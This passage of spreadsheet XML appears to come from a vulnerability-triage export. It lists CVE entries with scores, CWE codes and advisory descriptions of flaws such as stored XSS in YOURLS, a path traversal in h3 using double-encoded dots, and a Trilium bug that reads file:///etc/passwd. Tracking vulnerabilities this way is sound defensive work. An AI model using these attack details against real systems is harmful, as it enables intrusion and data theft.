          <t>YOURLS is a self-hosted, customizable URL shortener written in PHP. From 1.5.1 until 1.10.4, YOURLS stores the HTTP Referer header through yourls_get_referrer(), yourls_sanitize_url_safe(), and yourls_log_redirect(), then aggregates the value in yourls-infos.php and passes the derived domain through yourls_get_domain(), yourls_stats_pie(), and yourls_google_array_to_data_table(). The chart builder concatenates labels into inline JavaScript without JavaScript-string escaping, so an unauthenticated attacker can poison the statistics of an existing short URL with a crafted referrer. When an administrator or public stats-page viewer opens the affected statistics page, attacker-controlled JavaScript executes in the YOURLS origin and can access admin-visible data, the API signature token, and privileged same-origin actions. This issue is fixed in version 1.10.4.</t>
        </is>
      </c>
      <c r="S354" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63135</t>
        </is>
      </c>
    </row>
    <row r="355">
      <c r="A355" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B355" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C355" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63376</t>
        </is>
      </c>
      <c r="D355" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E355" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F355" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G355" s="5" t="inlineStr"/>
      <c r="H355" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I355" s="5" t="inlineStr"/>
      <c r="J355" s="5" t="inlineStr"/>
      <c r="K355" s="5" t="inlineStr"/>
      <c r="L355" s="5" t="inlineStr"/>
      <c r="M355" s="5" t="inlineStr"/>
      <c r="N355" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O355" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="P355" s="5" t="inlineStr"/>
      <c r="Q355" s="5" t="inlineStr">
        <is>
          <t>CWE-1321</t>
        </is>
      </c>
      <c r="R355" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">toml-node </t>
        </is>
      </c>
      <c r="S355" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63376</t>
        </is>
      </c>
    </row>
    <row r="356">
      <c r="A356" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B356" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C356" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-6485</t>
        </is>
      </c>
      <c r="D356" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E356" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F356" s="5" t="inlineStr">
        <is>
          <t>8338d8cb-57f7-4252-abc0-96fd13e98d21</t>
        </is>
      </c>
      <c r="G356" s="5" t="inlineStr"/>
      <c r="H356" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I356" s="5" t="inlineStr"/>
      <c r="J356" s="5" t="inlineStr"/>
      <c r="K356" s="5" t="inlineStr"/>
      <c r="L356" s="5" t="inlineStr"/>
      <c r="M356" s="5" t="inlineStr"/>
      <c r="N356" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O356" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P356" s="5" t="inlineStr"/>
      <c r="Q356" s="5" t="inlineStr">
        <is>
          <t>CWE-489</t>
        </is>
      </c>
      <c r="R356" s="5" t="inlineStr">
        <is>
          <t>UEFI BIOS embedded Shell could be used to bypass Secure Boot via shell commands or startup scripts.</t>
        </is>
      </c>
      <c r="S356" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-6485</t>
        </is>
      </c>
    </row>
    <row r="357">
      <c r="A357" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B357" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C357" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77358</t>
        </is>
      </c>
      <c r="D357" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E357" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F357" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G357" s="5" t="inlineStr"/>
      <c r="H357" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I357" s="5" t="inlineStr"/>
      <c r="J357" s="5" t="inlineStr"/>
      <c r="K357" s="5" t="inlineStr"/>
      <c r="L357" s="5" t="inlineStr"/>
      <c r="M357" s="5" t="inlineStr"/>
      <c r="N357" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O357" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="P357" s="5" t="inlineStr"/>
      <c r="Q357" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R357" s="5" t="inlineStr">
        <is>
          <t>cpp-httplib is a C++ header-only HTTP/HTTPS library. In versions 0.33.0 through 0.50.0, the TLS-enabled WebSocket client frees the TLS session before closing the WebSocket that still uses it, producing a use-after-free. In WebSocketClient::shutdown_and_close the SSL object is freed and the pointer cleared, but the subsequent WebSocket close still sends a close frame through the SSL socket stream, which holds a raw copy of the now-dangling session pointer and reads from and writes to the freed memory. The same freed-then-used ordering is reachable through the client's destructor and its connect path, so ordinary teardown of a secure WebSocket connection triggers the defect. This issue is fixed in version 0.50.1.</t>
        </is>
      </c>
      <c r="S357" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77358</t>
        </is>
      </c>
    </row>
    <row r="358">
      <c r="A358" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B358" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C358" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78491</t>
        </is>
      </c>
      <c r="D358" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E358" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F358" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G358" s="5" t="inlineStr"/>
      <c r="H358" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I358" s="5" t="inlineStr"/>
      <c r="J358" s="5" t="inlineStr"/>
      <c r="K358" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="L358" s="5" t="inlineStr"/>
      <c r="M358" s="5" t="inlineStr"/>
      <c r="N358" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O358" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P358" s="5" t="inlineStr"/>
      <c r="Q358" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="R358"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358" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78491</t>
        </is>
      </c>
    </row>
    <row r="359">
      <c r="A359" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B359" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C359" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84370</t>
        </is>
      </c>
      <c r="D359" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E359" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F359" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G359" s="5" t="inlineStr"/>
      <c r="H359" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I359" s="5" t="inlineStr"/>
      <c r="J359" s="5" t="inlineStr"/>
      <c r="K359" s="5" t="inlineStr"/>
      <c r="L359" s="5" t="inlineStr"/>
      <c r="M359" s="5" t="inlineStr"/>
      <c r="N359" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O359" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="P359" s="5" t="inlineStr"/>
      <c r="Q359" s="5" t="inlineStr">
        <is>
          <t>CWE-184, CWE-79</t>
        </is>
      </c>
      <c r="R359" s="5" t="inlineStr">
        <is>
          <t>SVGO, short for SVG Optimizer, is a Node.js library and command-line application for optimizing SVG files. From version 1.0.0 until versions 2.8.4, 3.3.5, and 4.1.0, the opt-in removeScripts plugin, named removeScriptElement in versions 2 and 3, incompletely filters executable links in plugins/removeScripts.js and lib/svgo/tools.js. The plugin does not recognize namespace-prefixed SVG anchor elements such as svg:a with href or namespaced *:href values, and it does not remove ASCII tab, line-feed, or carriage-return characters before checking URL schemes. Browsers remove those characters before parsing a scheme, allowing an executable link to pass the plugin's check. When an application processes attacker-controlled SVG input and serves the result in an active browser context, a victim who activates the surviving link can execute script in the SVG's origin, expose data, modify content, or perform actions as the victim. This issue is fixed in versions 2.8.4, 3.3.5, and 4.1.0.</t>
        </is>
      </c>
      <c r="S359" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84370</t>
        </is>
      </c>
    </row>
    <row r="360">
      <c r="A360" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B360" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C360" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85730</t>
        </is>
      </c>
      <c r="D360" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E360" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F360" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G360" s="5" t="inlineStr"/>
      <c r="H360" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I360" s="5" t="inlineStr"/>
      <c r="J360" s="5" t="inlineStr"/>
      <c r="K360" s="5" t="inlineStr"/>
      <c r="L360" s="5" t="inlineStr">
        <is>
          <t>npm:smol-toml</t>
        </is>
      </c>
      <c r="M360" s="5" t="inlineStr">
        <is>
          <t>1.7.1</t>
        </is>
      </c>
      <c r="N360" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O360" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P360" s="5" t="inlineStr"/>
      <c r="Q360" s="5" t="inlineStr">
        <is>
          <t>CWE-606, CWE-835</t>
        </is>
      </c>
      <c r="R360" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">smol-toml </t>
        </is>
      </c>
      <c r="S360" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85730</t>
        </is>
      </c>
    </row>
    <row r="361">
      <c r="A361" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B361" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C361" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86145</t>
        </is>
      </c>
      <c r="D361" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E361" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F361" s="5" t="inlineStr">
        <is>
          <t>cve@mitre.org</t>
        </is>
      </c>
      <c r="G361" s="5" t="inlineStr"/>
      <c r="H361" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I361" s="5" t="inlineStr"/>
      <c r="J361" s="5" t="inlineStr"/>
      <c r="K361" s="5" t="inlineStr"/>
      <c r="L361" s="5" t="inlineStr"/>
      <c r="M361" s="5" t="inlineStr"/>
      <c r="N361" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O361" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="P361" s="5" t="inlineStr"/>
      <c r="Q361" s="5" t="inlineStr">
        <is>
          <t>CWE-424</t>
        </is>
      </c>
      <c r="R361" s="5" t="inlineStr">
        <is>
          <t>PCRE2 before 10.48 allows a pcre2_dfa_match out-of-bounds write because reuse of a cached workspace block, in a recursive DFA matching workspace, lacks a size check (even though a newly allocated block, for the same purpose, does have a size check). This outcome requires an attacker-controlled regular expression, or a recursive pattern in conjunction with a small heap limit (this can be set through the API).</t>
        </is>
      </c>
      <c r="S361" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86145</t>
        </is>
      </c>
    </row>
    <row r="362">
      <c r="A362" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B362" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C362" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86251</t>
        </is>
      </c>
      <c r="D362" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E362" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F362" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G362" s="5" t="inlineStr"/>
      <c r="H362" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I362" s="5" t="inlineStr"/>
      <c r="J362" s="5" t="inlineStr"/>
      <c r="K362" s="5" t="inlineStr"/>
      <c r="L362" s="5" t="inlineStr"/>
      <c r="M362" s="5" t="inlineStr"/>
      <c r="N362" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O362" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="P362" s="5" t="inlineStr"/>
      <c r="Q362" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R362" s="5" t="inlineStr">
        <is>
          <t>h3 versions before 1.15.9 contain a path traversal vulnerability in the serveStatic utility. A double-decoding flaw allows a request path containing double-encoded dot sequences (e.g. %252e%252e) to be decoded to %2e%2e, which survives resolveDotSegments() because that function only checks for literal '.' characters. When the resulting asset ID is resolved by URL-based backends (CDN, S3, object storage), %2e%2e is interpreted as '..' per RFC 3986, enabling path traversal to read arbitrary files from the backend.</t>
        </is>
      </c>
      <c r="S362" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86251</t>
        </is>
      </c>
    </row>
    <row r="363">
      <c r="A363" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B363" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C363" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86297</t>
        </is>
      </c>
      <c r="D363" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E363" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F363" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G363" s="5" t="inlineStr"/>
      <c r="H363" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="I363" s="5" t="inlineStr"/>
      <c r="J363" s="5" t="inlineStr"/>
      <c r="K363" s="5" t="inlineStr"/>
      <c r="L363" s="5" t="inlineStr"/>
      <c r="M363" s="5" t="inlineStr"/>
      <c r="N363" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O363" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="P363" s="5" t="inlineStr"/>
      <c r="Q363" s="5" t="inlineStr">
        <is>
          <t>CWE-189, CWE-193</t>
        </is>
      </c>
      <c r="R363" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was identified in D-Link DIR-605 B1v202WWB03. This issue affects the function tunnel_set_params of the file progs.gpl/pppd.alpha/l2tp/tunnel.c of the component L2TP Control Message Parser. Such manipulation of the argument peer_hostname  leads to off-by-one. The attack may be performed from remote. Attacks of this nature are highly complex. The exploitability is assessed as difficult. The exploit is publicly available and might be used.</t>
        </is>
      </c>
      <c r="S363" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86297</t>
        </is>
      </c>
    </row>
    <row r="364">
      <c r="A364" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B364" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C364" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18147</t>
        </is>
      </c>
      <c r="D364" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E364" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F364" s="5" t="inlineStr">
        <is>
          <t>secalert@redhat.com</t>
        </is>
      </c>
      <c r="G364" s="5" t="inlineStr"/>
      <c r="H364" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I364" s="5" t="inlineStr"/>
      <c r="J364" s="5" t="inlineStr"/>
      <c r="K364" s="5" t="inlineStr"/>
      <c r="L364" s="5" t="inlineStr"/>
      <c r="M364" s="5" t="inlineStr"/>
      <c r="N364" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O364" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P364" s="5" t="inlineStr"/>
      <c r="Q364" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R364" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in FreeIPA. An unauthenticated remote attacker could exploit a DOM Cross-Site Scripting (XSS) vulnerability in the FreeIPA/IdM Web UI password reset page. By enticing a victim to click a specially crafted link and complete a password reset, the attacker could inject and execute arbitrary JavaScript code. This allows the attacker to perform actions within the victim's authenticated session, potentially leading to full administrative control if an IdM administrator is targeted.</t>
        </is>
      </c>
      <c r="S364" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18147</t>
        </is>
      </c>
    </row>
    <row r="365">
      <c r="A365" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B365" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C365" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-32257</t>
        </is>
      </c>
      <c r="D365" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E365" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F365" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G365" s="5" t="inlineStr"/>
      <c r="H365" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I365" s="5" t="inlineStr"/>
      <c r="J365" s="5" t="inlineStr"/>
      <c r="K365" s="5" t="inlineStr"/>
      <c r="L365" s="5" t="inlineStr"/>
      <c r="M365" s="5" t="inlineStr"/>
      <c r="N365" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O365" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="P365" s="5" t="inlineStr"/>
      <c r="Q365" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R365" s="5" t="inlineStr">
        <is>
          <t>Winter is a free, open-source content management system (CMS) based on the Laravel PHP framework. Prior to 1.2.13, custom CSS supplied through the Brand Settings Styles field by a backend user with the backend.manage_branding permission is compiled by the LESS parser and rendered without sanitization on every backend page, allowing stored cross-site scripting against backend users. This issue is fixed in version 1.2.13.</t>
        </is>
      </c>
      <c r="S365" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-32257</t>
        </is>
      </c>
    </row>
    <row r="366">
      <c r="A366" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B366" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C366" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-32258</t>
        </is>
      </c>
      <c r="D366" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E366" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F366" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G366" s="5" t="inlineStr"/>
      <c r="H366" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I366" s="5" t="inlineStr"/>
      <c r="J366" s="5" t="inlineStr"/>
      <c r="K366" s="5" t="inlineStr"/>
      <c r="L366" s="5" t="inlineStr"/>
      <c r="M366" s="5" t="inlineStr"/>
      <c r="N366" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O366" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="P366" s="5" t="inlineStr"/>
      <c r="Q366" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R366" s="5" t="inlineStr">
        <is>
          <t>Winter is a free, open-source content management system (CMS) based on the Laravel PHP framework. From 1.2.10 through 1.2.12, authenticated backend users with the backend.manage_editor permission can store custom Markup Styles that are compiled by the LESS parser and rendered without sanitization on every backend page, allowing stored cross-site scripting. This issue is fixed in version 1.2.13.</t>
        </is>
      </c>
      <c r="S366" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-32258</t>
        </is>
      </c>
    </row>
    <row r="367">
      <c r="A367" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B367" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C367" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-50979</t>
        </is>
      </c>
      <c r="D367" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E367" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F367" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G367" s="5" t="inlineStr"/>
      <c r="H367" s="5" t="n">
        <v>0.014</v>
      </c>
      <c r="I367" s="5" t="inlineStr"/>
      <c r="J367" s="5" t="inlineStr"/>
      <c r="K367" s="5" t="inlineStr"/>
      <c r="L367" s="5" t="inlineStr"/>
      <c r="M367" s="5" t="inlineStr"/>
      <c r="N367" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O367" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="P367" s="5" t="inlineStr"/>
      <c r="Q367" s="5" t="inlineStr">
        <is>
          <t>CWE-77</t>
        </is>
      </c>
      <c r="R367" s="5" t="inlineStr">
        <is>
          <t>A command injection vulnerability in the 'advanced/curl' component of Osbil Technology oPanel v1.19.50 and earlier allows authenticated attackers to execute arbitrary shell commands via the 'url' parameter</t>
        </is>
      </c>
      <c r="S367" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-50979</t>
        </is>
      </c>
    </row>
    <row r="368">
      <c r="A368" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B368" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C368" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53580</t>
        </is>
      </c>
      <c r="D368" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E368" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F368" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G368" s="5" t="inlineStr"/>
      <c r="H368" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I368" s="5" t="inlineStr"/>
      <c r="J368" s="5" t="inlineStr"/>
      <c r="K368" s="5" t="inlineStr"/>
      <c r="L368" s="5" t="inlineStr"/>
      <c r="M368" s="5" t="inlineStr"/>
      <c r="N368" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O368" s="5" t="inlineStr">
        <is>
          <t>2026-08-27</t>
        </is>
      </c>
      <c r="P368" s="5" t="inlineStr"/>
      <c r="Q368" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-552, CWE-73</t>
        </is>
      </c>
      <c r="R368" s="5" t="inlineStr">
        <is>
          <t>Trilium is an open-source hierarchical note-taking application. In versions prior to 0.104.0, the automatic image-download feature accepts file:// URLs in a note's img tags and reads the referenced local file with no path validation, allowing any authenticated user to disclose arbitrary files readable by the Trilium process. When a text note is saved, Trilium scans its HTML for image sources and downloads each external one; because the HTML sanitizer keeps file as an allowed scheme, a source such as file:///etc/passwd is passed straight to a filesystem read and its contents are stored as a note attachment the user can then retrieve. Pointing the same primitive at an unbounded source such as /dev/zero causes uncontrolled memory allocation that crashes the server process. The feature is enabled by default and is reachable through the web UI, the ETAPI, the web clipper, and note imports, requiring only an authenticated session or an ETAPI token. This issue is fixed in version 0.104.0</t>
        </is>
      </c>
      <c r="S368" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53580</t>
        </is>
      </c>
    </row>
    <row r="369">
      <c r="A369" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B369" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C369" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55065</t>
        </is>
      </c>
      <c r="D369" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E369" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F369" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G369" s="5" t="inlineStr"/>
      <c r="H369" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I369" s="5" t="inlineStr"/>
      <c r="J369" s="5" t="inlineStr"/>
      <c r="K369" s="5" t="inlineStr"/>
      <c r="L369" s="5" t="inlineStr"/>
      <c r="M369" s="5" t="inlineStr"/>
      <c r="N369" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O369" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="P369" s="5" t="inlineStr"/>
      <c r="Q369" s="5" t="inlineStr">
        <is>
          <t>CWE-285, CWE-639</t>
        </is>
      </c>
      <c r="R369" s="5" t="inlineStr">
        <is>
          <t>Vikunja is an open-source self-hosted task management platform. From 0.24.6 until 2.4.0, DELETE /api/v1/projects/:project/views/:view permits an authenticated user to supply a view identifier from another project while authorizing only against an attacker-controlled project identifier. ProjectView.CanDelete in pkg/models/project_view_permissions.go does not establish that the view belongs to the path project, and ProjectView.Delete in pkg/models/project_view.go continues after the scoped project_views delete affects no rows. Its subsequent deletes select task_buckets and task_positions only by project_view_id, allowing cross-tenant destruction of Kanban assignments and ordering while leaving the victim view and tasks intact. This issue is fixed in version 2.4.0.</t>
        </is>
      </c>
      <c r="S369" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55065</t>
        </is>
      </c>
    </row>
    <row r="370">
      <c r="A370" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B370" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C370" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55228</t>
        </is>
      </c>
      <c r="D370" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E370" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F370" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G370" s="5" t="inlineStr"/>
      <c r="H370" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I370" s="5" t="inlineStr"/>
      <c r="J370" s="5" t="inlineStr"/>
      <c r="K370" s="5" t="inlineStr"/>
      <c r="L370" s="5" t="inlineStr"/>
      <c r="M370" s="5" t="inlineStr"/>
      <c r="N370" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O370" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="P370" s="5" t="inlineStr"/>
      <c r="Q370" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="R370" s="5" t="inlineStr">
        <is>
